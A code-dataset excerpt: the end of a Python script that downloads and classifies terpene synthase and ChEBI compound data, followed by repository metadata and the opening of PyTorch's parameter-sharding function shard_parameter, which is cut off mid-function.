# CHEBI:67182 - sporulenol C35H58O
# CHEBI:138167 - 5-hydroxy-ฮฑ-gurjunene C15H26O
# CHEBI:61744 - ฮฒ-chamigrene C15H24
# CHEBI:61746 - (+)-beta-chamigrene C15H24
# CHEBI:10359 - (โ)-ฮฒ-chamigrene C15H24
_match = _r1.search(formula)
if _match:
_carbon_count = int(formula[_match.span()[0]+1:_match.span()[1]])
else:
# CHEBI:35757
# <FORMULA>CO2R</FORMULA>
_carbon_count = 0 # is zero or one but we do not care in this case anyway
if _carbon_count > 12 and _carbon_count < 17:
_terpene_type = 'sesq'
elif _carbon_count > 8 and _carbon_count < 13:
_terpene_type = 'mono' # C12
elif _carbon_count > 18 and _carbon_count < 22:
_terpene_type = 'di'
elif _carbon_count > 28 and _carbon_count < 32:
_terpene_type = 'tri'
elif _carbon_count > 31 and _carbon_count < 37:
_terpene_type = 'sesquar'
elif _carbon_count > 38 and _carbon_count < 42:
_terpene_type = 'tetra'
elif _carbon_count > 23 and _carbon_count < 27:
_terpene_type = 'sest'
elif not _carbon_count or _carbon_count < 6:
# CHEBI:35757
# <FORMULA>CO2R</FORMULA>
_terpene_type = None
else:
_terpene_type = 'unexpected'
return _terpene_type
def is_cyclic(smiles):
if smiles and Chem:
m = Chem.MolFromSmiles(smiles)
ri = m.GetRingInfo()
n_rings = ri.NumRings()
if n_rings > 0:
#print('cyclic')
return True
else:
#print('non-cyclic')
return False
else:
return None
def initialize_data_structures():
_uniprot_dict_of_lists = {'Uniprot ID': [], 'Uniprot secondary ID': [], 'Name': [], 'Alternative names': [], 'Submitted name': [], 'Description': [], 'Species': [], 'Taxonomy': [], 'Amino acid sequence': [], 'Kingdom (plant, fungi, bacteria)': [], 'ChEBI ID': [], 'EC numbers': [], 'Rhea IDs':[], 'Reactions': [], 'Substrate ChEBI IDs': [], 'Product ChEBI IDs': [], 'Cofactor ChEBI IDs': [], 'Cofactors': [], 'Notes': [], 'Publication (URL)': []}
_chebi_dict_of_lists = {'ChEBI ID': [], 'Compound name': [], 'Compound description': [], 'Formula': [], 'SMILES': [], 'Type (mono, sesq, di, โฆ)': [], 'cyclic/acyclic': []}
for _colname in extra_product_colnames + extra_substrate_colnames:
_uniprot_dict_of_lists[_colname] = []
_copy_without_chebi_id = copy.deepcopy(_chebi_dict_of_lists)
_copy_without_chebi_id.pop('ChEBI ID')
_empty_template_dict_of_lists = copy.deepcopy(_uniprot_dict_of_lists)
_empty_template_dict_of_lists.update({'Type (mono, sesq, di, โฆ)': [], 'cyclic/acyclic': []})
return _uniprot_dict_of_lists, _chebi_dict_of_lists, _copy_without_chebi_id, _empty_template_dict_of_lists
def split_chebi_data_into_substrates_and_products_wrapper(primary_accession, chebi_dict_of_lists, chebi_ids, substrate_ids, product_ids):
"""Split ChEBI IDs obtained for a single reaction into relevant categories.
If that fails, return an empty list for each to keep lengths same.
This function needs reworking to simultaneously split into all groups.
"""
if myoptions.verbose: print("Info: %s: Received: chebi_ids=%s, chebi_dict_of_lists=%s, substrate_ids=%s, product_ids=%s" % (primary_accession, str(chebi_ids), str(chebi_dict_of_lists), str(substrate_ids), str(product_ids)))
_substrate_ids, _product_ids = split_chebi_data_into_substrates_and_products(primary_accession, chebi_ids, chebi_dict_of_lists)
if _substrate_ids or _product_ids:
substrate_ids.append(_substrate_ids)
product_ids.append(_product_ids)
else:
# append empty lists so that len(_reactions) and e.g. len(_product_ids) are equal even if the
# _substrate_ids or _product_ids are all empty because all ChEBI IDs were discarded as acyclic terpenes and no known substrates
# Q50L36: dimethylallyl diphosphate = diphosphate + isoprene
substrate_ids.append([])
product_ids.append([])
def split_chebi_data_into_substrates_and_products(primary_accession, chebi_ids, chebi_dict_of_lists):
_substrate_ids = []
_cofactor_ids = []
_product_ids = []
for _chebi_id in chebi_ids:
if _chebi_id:
_terpene_type = process_chebi(_chebi_id, chebi_dict_of_lists) # parse ChEBI XML files and fill chebi_dict_of_lists
if _chebi_id in substrates:
_substrate_ids.append(_chebi_id)
elif _chebi_id in possible_cofactors:
_cofactor_ids.append(_chebi_id)
elif myoptions.run_mode == 'CYPs':
_product_ids.append(_chebi_id) # probably should also come up with a blacklist of radicals, oxygen, etc., like for the 'terpene_synthases' run_mode
#elif _chebi_id in intermediates:
# # CHEBI:63190 (+)-ฮฒ-caryophyllene aka (S)-ฮฒ-bisabolene
# # CHEBI:58622 9ฮฑ-copalyl diphosphate
# # CHEBI:58553 ent-copalyl diphosphate
# # CHEBI:64283 copal-8-ol diphosphate(3โ)
# # CHEBI:58635 CHEBI:30939 CHEBI:10760, CHEBI:29558 (+)-copalyl diphosphate, see e.g. H8ZM70
# intermediate_ids.append(_chebi_id2)
# _has_intermediate = True
elif _chebi_id in non_terpene_and_acyclic_terpene_chebi_ids:
# A0A2N0DJE2 catalyzes 'isopentenyl diphosphate = dimethylallyl diphosphate' reaction, we want to discard such enzymes
# A0A3L6DH13 catalyzes 'a quinone + H(+) + NADH = a quinol + NAD(+)', 'a quinone + H(+) + NADPH = a quinol + NADP(+)' reaction
# 'CHEBI:33019' diphosphate(3โ)
# 'CHEBI:57945' NADH(2-)
# 'CHEBI:58349' NADP(3-)
# is not a product nor a cofactor nor a substrate, just skip it
pass
print("Debug: %s: split_chebi_data_into_substrates_and_products(): Skipping this non-terpene ChEBI ID" % _chebi_id)
elif _terpene_type:
_product_ids.append(_chebi_id)
elif myoptions.run_mode == 'terpene_synthases':
print("Warning: %s: Unexpected compound %s or a good candidate for non_terpene_and_acyclic_terpene_chebi_ids blacklist" % (_chebi_id, str(_terpene_type)))
if not _product_ids and myoptions.run_mode == 'terpene_synthases':
# Q50L36: dimethylallyl diphosphate = diphosphate + isoprene
print("Info: %s: Failed to find a cyclic terpene product in any of these: %s" % (primary_accession, str(chebi_ids))) # CHEBI:15385 (+)-ฮด-cadinene
if myoptions.debug: print("Debug: split_chebi_data_into_substrates_and_products(): Returning _substrate_ids=%s, _product_ids=%s" % (str(_substrate_ids), str(_product_ids)))
return natsorted(_substrate_ids), natsorted(_product_ids)
def print_dict_lengths(somedict, dictname):
for _item in somedict.keys():
if myoptions.debug > 3: print("%s: Key=%s, len=%d" % (dictname, _item, len(somedict[_item])))
print("Info: Will output into CSV and XLS files in total %s: Key=%s, len=%d" % (dictname, _item, len(somedict[_item])))
def convert_to_primary_ids(ids, primaries, aliases, ids_parsed_from_xls_storage, uniprot_aliases2pri_acc):
_requested_primary_ids = []
for _x in ids:
if _x in primaries:
if _x not in _requested_primary_ids and _x not in ids_parsed_from_xls_storage:
_requested_primary_ids.append(_x)
else:
if myoptions.debug: print("Debug: Discarded %s from _ids" % _x)
elif _x in aliases:
_xx = uniprot_aliases2pri_acc[_x]
if _xx not in _requested_primary_ids and _xx not in ids_parsed_from_xls_storage:
_requested_primary_ids.append(_xx)
else:
if myoptions.debug: print("Debug: Discarded %s from _ids" % _xx)
else:
_requested_primary_ids.append(_x.upper()) # cannot say if it is primary or secondary, just keep it
return _requested_primary_ids
def parse_idfile(infile):
_ids = []
if os.path.exists(infile):
with open(infile) as _tsv_file:
for _line in _tsv_file:
_id = _line[:-1].strip()
if _id:
if _id not in _ids:
_ids.append(_id)
else:
sys.stderr.write("Warning: Duplicated Uniprot ID %s requested in %s file, ignoring it.\n" % (_id, infile))
return _ids
def write_fasta_file(sequence2_uniprot_pri_accs, datetime, accessions=[]):
if not accessions:
_filename = 'TPSdownloader_' + datetime + '.fasta'
else:
_filename = 'TPSdownloader_to_be_added_new_proteins__' + datetime + '.fasta'
_i = 0
with open(_filename, 'w') as _outfile:
for _myseq, _accession_ids in sequence2_uniprot_pri_accs.items():
if not accessions or not [x for x in _accession_ids if x not in accessions]:
_outfile.write(">%s%s%s%s" % (' '.join(_accession_ids), os.linesep, _myseq, os.linesep))
_i += 1
print("Info: Wrote %s file with %d protein sequences" % (_filename, _i))
def main():
create_cache()
# unused code
# _known_terpenes = parse_known_terpenes()
_uniprot_pri_acc2aliases = {}
_uniprot_aliases2pri_acc = {}
_all_uniprot_ids = set()
_all_chebi_ids = set()
_all_product_chebi_ids = set()
_all_ec_numbers = set()
_all_rhea_ids = set()
_sequence2_uniprot_pri_accs = {}
if myoptions.uniprot_ids_from_file and not os.path.exists(myoptions.uniprot_ids_from_file):
raise ValueError("File %s does not exist." % str(myoptions.uniprot_ids_from_file))
_already_parsed = []
if myoptions.xls_storage and os.path.exists(myoptions.xls_storage) and myoptions.xls_storage != 'None':
_uniprot_dict_of_lists, _chebi_dict_of_lists, _copy_without_chebi_id, _empty_template_dict_of_lists = parse_storage(myoptions.xls_storage)
else:
# one can disable the default value with passing None on the commandline
_uniprot_dict_of_lists, _chebi_dict_of_lists, _copy_without_chebi_id, _empty_template_dict_of_lists = initialize_data_structures()
_output_dict_of_lists = copy.deepcopy(_empty_template_dict_of_lists)
if myoptions.debug: print("Debug: Initialized data structures and parsed XLS storage into _uniprot_dict_of_lists=%s", str(_uniprot_dict_of_lists))
#_myindex = _uniprot_dict_of_lists['Uniprot ID'].index('A0A0R0GVB3')
#print("Test: %s: _uniprot_dict_of_lists['Uniprot ID'][%s]=%s" % ('A0A0R0GVB3', 'A0A0R0GVB3', str(_uniprot_dict_of_lists['Uniprot ID'][_myindex])))
_already_parsed = list(_uniprot_dict_of_lists['Uniprot ID'])
_ids_parsed_from_xls_storage = list(_already_parsed)
_primaries = []
# when working with same substance ID, issue eventual warning just once per ChEBI ID
_warn_once_per_chebi_entry = []
# parse previously obtained multi-entry XML data, if any
for _filename in os.listdir('.TPSdownloader_cache/uniprot/multientry/'):
print("Info: Found multi-entry XML file %s" % '.TPSdownloader_cache/uniprot/multientry/' + _filename)
if os.path.getsize('.TPSdownloader_cache/uniprot/multientry/' + _filename):
print("Info: Parsing %s" % '.TPSdownloader_cache/uniprot/multientry/' + _filename)
for _primary_accession, _secondary_accessions, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry, _recommended_name, _alternative_names, _submitted_name, _feature_descriptions, _organism, _lineage, _sequence in parse_uniprot_xml('.TPSdownloader_cache/uniprot/multientry/' + _filename, _uniprot_pri_acc2aliases, _uniprot_aliases2pri_acc, _already_parsed):
process_parsed_uniprot_values(_all_uniprot_ids, _all_chebi_ids, _uniprot_dict_of_lists, _chebi_dict_of_lists, _already_parsed, _primary_accession, _secondary_accessions, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry, _recommended_name, _alternative_names, _submitted_name, _feature_descriptions, _organism, _lineage, _sequence, _uniprot_pri_acc2aliases, _uniprot_aliases2pri_acc, _primaries, _warn_once_per_chebi_entry)
if myoptions.debug:
print("Debug: After parsing multi-entry XML files _all_uniprot_ids=%s" % str(_all_uniprot_ids))
print("Debug: After parsing multi-entry XML files _all_chebi_ids=%s" % str(_all_chebi_ids))
# get list of Uniprot IDs to obtain
if myoptions.uniprot_id:
download_uniprot(myoptions.uniprot_id)
_ids = (myoptions.uniprot_id)
elif myoptions.uniprot_ids_from_file and os.path.exists(myoptions.uniprot_ids_from_file):
# get list of accessions, fetch their single-entry XML files unless already in local cache and parse them
_ids = fetch_ids_from_xlsx(myoptions.uniprot_ids_from_file, _primaries, _uniprot_pri_acc2aliases, _uniprot_aliases2pri_acc, _uniprot_dict_of_lists, _already_parsed, _all_uniprot_ids, _all_chebi_ids)
elif myoptions.uniprot_idfile:
_ids = parse_idfile(myoptions.uniprot_idfile)
if not _ids:
raise ValueError("No Uniprot IDs provided to act upon, nothing to do. Either specify input ids via --uniprot-id-file or provide an input XLSX file via --uniprot-ids-from-file with a column 'Uniprot ID' in 'Sheet1'")
if myoptions.debug:
print("Debug: After parsing UniProt IDs from files _all_uniprot_ids=%s" % str(_all_uniprot_ids))
print("Debug: After parsing UniProt IDs from files _all_chebi_ids=%s" % str(_all_chebi_ids))
#_myindex = _uniprot_dict_of_lists['Uniprot ID'].index('A0A0R0GVB3')
#print("Test: %s: _uniprot_dict_of_lists['Uniprot ID'][%s]=%s" % ('A0A0R0GVB3', 'A0A0R0GVB3', str(_uniprot_dict_of_lists['Uniprot ID'][_myindex])))
_aliases = _uniprot_aliases2pri_acc.keys()
_ids = convert_to_primary_ids(_ids, _primaries, _aliases, _ids_parsed_from_xls_storage, _uniprot_aliases2pri_acc)
# parsing the already curated list of entries is suboptimal via parse_storage() so provide another hook just to input the protein IDs
# keep this in a distinct list
if myoptions.already_curated_idfile:
_ids_manually_collected2 = parse_idfile(myoptions.already_curated_idfile)
_ids_manually_collected2 = convert_to_primary_ids(_ids_manually_collected2, _primaries, _aliases, [], _uniprot_aliases2pri_acc)
else:
_ids_manually_collected2 = []
_obsolete_entries = []
for _id in _ids: # it is probably better to keep original ordering and just omitting duplicated Uniprot IDs
if _id not in _already_parsed: # we have to be certain it is a current listing
_filename = '.TPSdownloader_cache/uniprot/' + _id + '.xml'
if os.path.exists(_filename) and os.path.getsize(_filename):
for _primary_accession, _secondary_accessions, _chebi_ids, _rhea_ids, _ec_numbers, _reactions, _cofactor_ids_per_entry, _cofactors_per_entry, _recommended_name, _alternative_names, _submitted_name, _feature_descriptions, _organism, _lineage, _sequence in parse_uniprot_xml(_filename, _uniprot_pri_acc2aliases, _uniprot_aliases2pri_acc, _already_parsed):
process_parsed_uniprot_values(_all_uniprot_ids, _all_chebi_ids, _uniprot_dict_of_lists, _chebi_dict_of_lists, _already_parsed, _primary_accession, _secondary_accessions, _chebi_ids, _rhea_ids, _ec_numbers, _reactions, _cofactor_ids_per_entry, _cofactors_per_entry, _recommended_name, _alternative_names, _submitted_name, _feature_descriptions, _organism, _lineage, _sequence, _uniprot_pri_acc2aliases, _uniprot_aliases2pri_acc, _primaries, _warn_once_per_chebi_entry)
elif _id not in _primaries and _id not in _uniprot_aliases2pri_acc:
# This entry is obsolete
# A0A1C4NU45, A0A1C4QLD8, A0A6H2TAF2, A0A6M0EDU3, A0A6M0EJ23, A0A6M0E6U2, A0A6N9WZ95, A0A6N9XB68, A0A6N9XHS1, A0A7H5IRS5, A0A7H5ITL2, A0A7H5JDR3, A0A7H5JHP0
# https://www.uniprot.org/help/proteome_redundancy
sys.stderr.write("Warning: No single-entry XML file %s exists and the %s was not parsed in multi-entry XML files yet. This could be a protein deleted from Uniprot/TrEMBL but kept in UniParc.\n" % (str(_filename), _id))
_obsolete_entries.append(_id)
else:
print("Info: XML file with %s does not exist, cannot parse it." % _id)
#print("Test: %s: _uniprot_dict_of_lists['Uniprot ID'][%s]=%s" % ('A0A0R0GVB3', 'A0A0R0GVB3', str(_uniprot_dict_of_lists['Uniprot ID'][_uniprot_dict_of_lists['Uniprot ID'].index('A0A0R0GVB3')])))
_aliases = _uniprot_pri_acc2aliases.values()
# make sure the Uniprot IDs in the manually curated table are indeed primary IDs, likewise check the list of requested IDs
_ids_parsed_from_xls_storage = convert_to_primary_ids(_ids_parsed_from_xls_storage, _primaries, _aliases, _ids_parsed_from_xls_storage, _uniprot_aliases2pri_acc)
_ids_manually_collected2 = convert_to_primary_ids(_ids_manually_collected2, _primaries, _aliases, [], _uniprot_aliases2pri_acc)
_requested_primary_ids = convert_to_primary_ids(set(_ids) - set(_obsolete_entries), _primaries, _aliases, _ids_parsed_from_xls_storage, _uniprot_aliases2pri_acc)
if myoptions.debug:
print("Debug: after parsing single-entry XML files _all_uniprot_ids=%s" % str(_all_uniprot_ids))
print("Debug: after parsing single-entry XML files _obsolete_entries=%s" % str(_obsolete_entries))
print("Debug: after parsing single-entry XML files _all_chebi_ids=%s" % str(_all_chebi_ids))
print("Info: len(_already_parsed)=%s" % len(_already_parsed))
#print("AAAAA: len(_uniprot_dict_of_lists)=%d, len(_uniprot_dict_of_lists['Uniprot ID'])=%s, _uniprot_dict_of_lists: %s" % (len(_uniprot_dict_of_lists), len(_uniprot_dict_of_lists['Uniprot ID']), str(_uniprot_dict_of_lists)))
if myoptions.debug > 1: print("Debug: After parsing ChEBI files _uniprot_dict_of_lists=", str(_uniprot_dict_of_lists))
print("Info: There are %s 'ChEBI ID' entries in _chebi_dict_of_lists: %s" % (len(_chebi_dict_of_lists['ChEBI ID']), str(_chebi_dict_of_lists)))
#print("Test: %s: _uniprot_dict_of_lists['Uniprot ID'][%s]=%s" % ('A0A0R0GVB3', 'A0A0R0GVB3', str(_uniprot_dict_of_lists['Uniprot ID'][_uniprot_dict_of_lists['Uniprot ID'].index('A0A0R0GVB3')])))
# re-copy the parsed data into rows if there are multiple _chebi_ids annotated (pointing to multiple cyclic terpenes), other ChEBI IDs were discarded
_unique_uniprot_ids = _uniprot_dict_of_lists['Uniprot ID']
_merged_ids_manually_collected = set(_ids_parsed_from_xls_storage).union(set(_ids_manually_collected2))
for _uniprot_row_pos, _uniprot_id in enumerate(_unique_uniprot_ids):
if _uniprot_id in _requested_primary_ids or _uniprot_id in _merged_ids_manually_collected: # transfer for output only those Uniprot IDs which we were asked for plus those in the xls_storage
if myoptions.debug:
print("Debug: Will output Uniprot ID %s" % _uniprot_id)
_chebi_id_lists = _uniprot_dict_of_lists['ChEBI ID'][_uniprot_row_pos]
_reactions = _uniprot_dict_of_lists['Reactions'][_uniprot_row_pos]
_product_ids = _uniprot_dict_of_lists['Product ChEBI IDs'][_uniprot_row_pos]
_rhea_ids = _uniprot_dict_of_lists['Rhea IDs'][_uniprot_row_pos]
_ec_numbers = _uniprot_dict_of_lists['Rhea IDs'][_uniprot_row_pos]
for _myval in _uniprot_dict_of_lists['Rhea IDs'][_uniprot_row_pos]:
_all_rhea_ids.update(_myval)
for _myval in _uniprot_dict_of_lists['EC numbers'][_uniprot_row_pos]:
_all_ec_numbers.update(_myval)
for _myval in _uniprot_dict_of_lists['Product ChEBI IDs'][_uniprot_row_pos]:
_all_product_chebi_ids.update(_myval)
# for each CHEBI item in _nested_chebi_ids, output a dedicated line in the output
if len(_output_dict_of_lists['ChEBI ID']) != len(_output_dict_of_lists['Uniprot ID']):
print_dict_lengths(_uniprot_dict_of_lists, '_uniprot_dict_of_lists')
print_dict_lengths(_chebi_dict_of_lists, '_chebi_dict_of_lists')
print_dict_lengths(_output_dict_of_lists, '_output_dict_of_lists')
raise ValueError("Error: %s: Sizes do not match,\n_output_dict_of_lists: %s\n" % (_uniprot_id, str(_output_dict_of_lists)))
if (_reactions and _reactions[0]) or (_product_ids and _product_ids[0]) or (_rhea_ids and _rhea_ids[0]) or (_ec_numbers and _ec_numbers[0]):
if myoptions.debug:
print("Debug: %s: _reactions=%s" % (_uniprot_id, str(_reactions)))
print("Debug: %s: _product_ids=%s" % (_uniprot_id, str(_product_ids)))
print("Debug: %s: _rhea_ids=%s" % (_uniprot_id, str(_rhea_ids)))
print("Debug: %s: _ec_numbers=%s" % (_uniprot_id, str(_ec_numbers)))
if len(_reactions) != len(_product_ids):
raise ValueError("Error: %s: Sizes do not match: len(_reactions)=%s, len(_product_ids)=%s, _reactions=%s, _product_ids=%s" % (_uniprot_id, len(_reactions), len(_product_ids), str(_reactions), str(_product_ids)))
for _i, _reaction in enumerate(_reactions):
# re-copy the Uniprot-originating data
if _product_ids[_i]:
_product_chebi_id = _product_ids[_i][0] # there is only a single item
else:
# https://www.uniprot.org/uniprot/A2PZA5.xml
# <reaction evidence="4 8">
# <text>
# (2E,6E)-farnesyl diphosphate + isopentenyl diphosphate = (2E,6E,10E)-geranylgeranyl diphosphate + diphosphate
# </text>
# <dbReference type="Rhea" id="RHEA:17653"/>
# <dbReference type="ChEBI" id="CHEBI:33019"/>
# <dbReference type="ChEBI" id="CHEBI:58756"/>
# <dbReference type="ChEBI" id="CHEBI:128769"/>
# <dbReference type="ChEBI" id="CHEBI:175763"/>
# <dbReference type="EC" id="2.5.1.29"/>
# </reaction>
if myoptions.run_mode == 'terpene_synthases':
print("Info: %s: No cyclic terpene ChEBI ID found for a product of reaction=%s" % (_uniprot_id, str(_reaction)))
_product_chebi_id = None
for _column in _uniprot_dict_of_lists.keys():
_val = _uniprot_dict_of_lists[_column][_uniprot_row_pos]
if _val:
_output_dict_of_lists[_column].append(_val)
else:
_output_dict_of_lists[_column].append('')
if _product_chebi_id:
_chebi_row_pos = _chebi_dict_of_lists['ChEBI ID'].index(_product_chebi_id)
for _column in ['Type (mono, sesq, di, โฆ)', 'cyclic/acyclic']:
_val = _chebi_dict_of_lists[_column][_chebi_row_pos]
if _val:
_output_dict_of_lists[_column].append(_val)
else:
_output_dict_of_lists[_column].append('')
else:
for _column in ['Type (mono, sesq, di, โฆ)', 'cyclic/acyclic']:
_output_dict_of_lists[_column].append('')
else:
# re-copy just the Uniprot-originating data
for _column in _uniprot_dict_of_lists.keys():
try:
_val = _uniprot_dict_of_lists[_column][_uniprot_row_pos]
except IndexError:
sys.stderr.write("Error: There are the following columns defined in _uniprot_dict_of_lists: %s\n" % str(_uniprot_dict_of_lists.keys()))
raise IndexError("Row %s in '%s' column is missing, cannot copy its values from _uniprot_dict_of_lists which has length %s" % (str(_uniprot_row_pos), str(_column), len(_uniprot_dict_of_lists[_column])))
if _val:
_output_dict_of_lists[_column].append(_val)
else:
_output_dict_of_lists[_column].append('')
# fill-in the missing ChEBI data placeholders
# for _column in _chebi_dict_of_lists.keys():
# _output_dict_of_lists[_column].append('')
for _column in ['Type (mono, sesq, di, โฆ)', 'cyclic/acyclic']:
_output_dict_of_lists[_column].append('')
_myseq = _uniprot_dict_of_lists['Amino acid sequence'][_uniprot_row_pos]
# print("Debug: %s: _myseq=%s, _sequence2_uniprot_pri_accs.keys()=%s" % (_uniprot_id, str(_myseq), str(_sequence2_uniprot_pri_accs.keys())))
if _myseq in _sequence2_uniprot_pri_accs.keys():
if _uniprot_id not in _sequence2_uniprot_pri_accs:
_sequence2_uniprot_pri_accs[_myseq].update([_uniprot_id])
else:
_sequence2_uniprot_pri_accs[_myseq] = set([_uniprot_id])
#print("Test: %s: _uniprot_dict_of_lists['Uniprot ID'][%s]=%s" % ('A0A0R0GVB3', 'A0A0R0GVB3', str(_uniprot_dict_of_lists['Uniprot ID'][_uniprot_dict_of_lists['Uniprot ID'].index('A0A0R0GVB3')])))
print_dict_lengths(_uniprot_dict_of_lists, '_uniprot_dict_of_lists')
print_dict_lengths(_chebi_dict_of_lists, '_chebi_dict_of_lists')
print_dict_lengths(_output_dict_of_lists, '_output_dict_of_lists')
_all_chebi_ids = natsorted(list(_all_chebi_ids))
_all_product_chebi_ids = natsorted(list(_all_product_chebi_ids))
_all_ec_numbers = natsorted(list(_all_ec_numbers))
_all_rhea_ids = natsorted(list(_all_rhea_ids))
#print("Test: %s: _uniprot_dict_of_lists['Uniprot ID'][%s]=%s" % ('A0A0R0GVB3', 'A0A0R0GVB3', str(_uniprot_dict_of_lists['Uniprot ID'][_uniprot_dict_of_lists['Uniprot ID'].index('A0A0R0GVB3')])))
_already_curated_sequences = []
for _myseq, _accessions in _sequence2_uniprot_pri_accs.items():
if [x for x in _merged_ids_manually_collected if x in _accessions]:
print("Info: %s: protein sequence already annotated" % _myseq)
else:
_already_curated_sequences.append(_myseq)
_newly_annotated_dict_of_lists = copy.deepcopy(_empty_template_dict_of_lists)
for _id in _requested_primary_ids:
if _id not in _merged_ids_manually_collected:
try:
_uniprot_row_pos = _output_dict_of_lists['Uniprot ID'].index(_id)
except ValueError:
if _id in _obsolete_entries:
pass
else:
raise ValueError("Cannot find Uniprot ID %s in _requested_primary_ids" % _id)
_myseq = _uniprot_dict_of_lists['Amino acid sequence'][_uniprot_row_pos]
if _myseq not in _already_curated_sequences:
# the first entry with a unique sequence for a cluster of entries will win, no matter if is annotated or not
for _column in _output_dict_of_lists.keys():
_val = _output_dict_of_lists[_column][_uniprot_row_pos]
if _val:
_newly_annotated_dict_of_lists[_column].append(_val)
else:
_newly_annotated_dict_of_lists[_column].append('')
else:
# TODO: maybe check if the current entry is annotated in more detail?
pass
# or maybe better do it in Pandas?
# https://stackoverflow.com/questions/42483959/copy-some-rows-from-existing-pandas-dataframe-to-a-new-one
_df_newly_annotated = pd.DataFrame(_newly_annotated_dict_of_lists)
print("Info: %d entries in _all_chebi_ids=%s" % (len(_all_chebi_ids), str(_all_chebi_ids)))
print("Info: %d entries in _all_product_chebi_ids=%s" % (len(_all_product_chebi_ids), str(_all_product_chebi_ids)))
print("Info: %d entries in _all_ec_numbers=%s" % (len(_all_ec_numbers), str(natsorted(_all_ec_numbers))))
print("Info: %d entries in _all_rhea_ids=%s" % (len(_all_rhea_ids), str(natsorted(_all_rhea_ids))))
print("Info: %d entries in _obsolete_entries=%s" % (len(_obsolete_entries), str(_obsolete_entries)))
# move dictionary of lists into Pandas dataframe at once
_df = pd.DataFrame(_output_dict_of_lists)
_df_all_product_chebi_ids = pd.DataFrame(_all_product_chebi_ids)
_df_all_ec_numbers = pd.DataFrame(_all_ec_numbers)
_df_all_rhea_ids = pd.DataFrame(_all_rhea_ids)
if myoptions.debug:
print_df(_df)
print_df(_df_all_product_chebi_ids)
print_df(_df_all_ec_numbers)
print_df(_df_all_rhea_ids)
print_df(_df_newly_annotated)
_datetime = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
writer = pd.ExcelWriter("TPSdownloader_" + _datetime + ".xlsx", engine='xlsxwriter')
frames = {'Sheet1': _df, 'All Product ChEBI IDs': _df_all_product_chebi_ids, 'All EC numbers': _df_all_ec_numbers, 'All Rhead IDs': _df_all_rhea_ids, 'New proteins to be curated': _df_newly_annotated}
#now loop through and put each on a specific sheet
for sheet, frame in frames.items(): # .use .items for python 3.X
frame.to_excel(writer, sheet_name = sheet, index = False)
#critical last step
writer.save()
print("Info: Wrote TPSdownloader_" + _datetime + ".xlsx file.")
write_csv_and_xls(_df, datetime=_datetime)
write_csv_and_xls(_df_all_product_chebi_ids, suffix="product_ChEBI_IDs_", datetime=_datetime)
write_csv_and_xls(_df_all_ec_numbers, suffix="EC_numbers_", datetime=_datetime)
write_csv_and_xls(_df_all_rhea_ids, suffix="Rhea_IDs_", datetime=_datetime)
write_fasta_file(_sequence2_uniprot_pri_accs, datetime=_datetime, accessions=[])
write_fasta_file(_sequence2_uniprot_pri_accs, datetime=_datetime, accessions=_newly_annotated_dict_of_lists['Uniprot ID'])
#if myoptions.outfmt == "csv":
# df.to_csv("TPSdownloader.csv", index=False, sep='\t')
#elif myoptions.outfmt == "xls":
# df.to_excel("TPSdownloader.xls", index=False)
#else:
# # maybe more formats would be helpful?
# df.to_excel("TPSdownloader.xls", index=False)
if __name__ == "__main__":
main()
# vim:ts=4:sw=4:expandtab:smartindent
| 60.026475 | 1,044 | 0.654381 |
8543a1c1569809cead52e5a861f1e32f17b9bff8 | 5,885 | py | Python | torch/distributed/shard/api.py | jiajianglong/pytorch | 815532d40c25e81d8c09b3c36403016bea394aee | [
"Intel"
] | 1 | 2022-01-31T14:15:35.000Z | 2022-01-31T14:15:35.000Z | torch/distributed/shard/api.py | SurajPratap10/pytorch | 63bc76798477f2e3af7d5f92abf1d78eb7bd2a54 | [
"Intel"
] | null | null | null | torch/distributed/shard/api.py | SurajPratap10/pytorch | 63bc76798477f2e3af7d5f92abf1d78eb7bd2a54 | [
"Intel"
] | null | null | null | import copy
import torch
import torch.distributed as dist
from torch.distributed import distributed_c10d
from .sharding_spec import (
ChunkShardingSpec,
ShardingSpec,
)
from torch.distributed.shard.sharding_spec._internals import (
get_chunked_dim_size,
get_split_size,
)
from torch.distributed.shard.sharded_tensor import (
Shard,
ShardMetadata,
ShardedTensor,
)
def shard_parameter(
module: torch.nn.Module,
param_name: str,
sharding_spec: ShardingSpec,
src_rank=0,
process_group=None):
"""
Given a :class:`torch.nn.Module`, a ``param_name`` for a parameter in that
module, it shards that parameter according to the provided
``sharding_spec``. ``src_rank`` denotes the source rank which would be
used as the ground truth of the data which would be scattered as shards
across the rest of the ranks.
This method replaces ``module.param_name`` with a
:class:`torch.distributed.shard.sharded_tensor.ShardedTensor`
Args:
module (:class:`torch.nn.Module`): Module whose parameter needs to be sharded.
param_name (str): Name of the parameter of ``module`` that needs to be sharded.
sharding_spec (:class:`torch.distributed.shard.sharding_spec.ShardingSpec`): The specification
describing how to shard the Tensor.
Keyword args:
src_rank (int, optional): The source rank which is used as the ground truth of
the data for the parameter that would be sharded and scattered
across the rest of the ranks.
Default: 0.
process_group (ProcessGroup, optional): The process group to work on. If None,
the default process group will be used.
.. warning::
Only :class:`torch.distributed.shard.sharding_spec.ShardingSpec` is
currently supported as the ``sharding_spec``.
"""
# Perform some validation first.
if not isinstance(sharding_spec, ChunkShardingSpec):
raise ValueError('Only ChunkShardingspec is supported.')
if not hasattr(module, param_name):
raise ValueError(f'module: {module} does not have parameter with name: {param_name}')
tensor = getattr(module, param_name)
if not isinstance(tensor, torch.Tensor):
raise ValueError(f'Expected {type(module).__name__}.{param_name} to be a Tensor, but found {type(tensor).__name__}')
if not tensor.is_contiguous():
raise ValueError(f'param: {param_name} is not a contiguous Tensor')
pg = process_group if process_group is not None else distributed_c10d._get_default_group()
world_size = dist.get_world_size(pg)
rank = dist.get_rank(pg)
# Validate src_rank and sharding_spec are same across all ranks.
gathered_list = [None] * world_size
dist.all_gather_object(gathered_list, (src_rank, sharding_spec), group=pg)
for idx, entry in enumerate(gathered_list):
if src_rank != entry[0]: # type: ignore[index]
raise ValueError(
f'src_rank={src_rank} on rank: {rank} does not ' # type: ignore[index]
f'match with src_rank={entry[0]} on rank: {idx}')
if sharding_spec != entry[1]: # type: ignore[index]
raise ValueError(
f'sharding_spec={sharding_spec} on rank: {rank} does not ' # type: ignore[index]
f'match with sharding_spec={entry[1]} on rank: {idx}')
# Rearrange chunks according to placement.
local_metadata = None
current_offsets = [0] * len(tensor.size())
shards_metadata = []
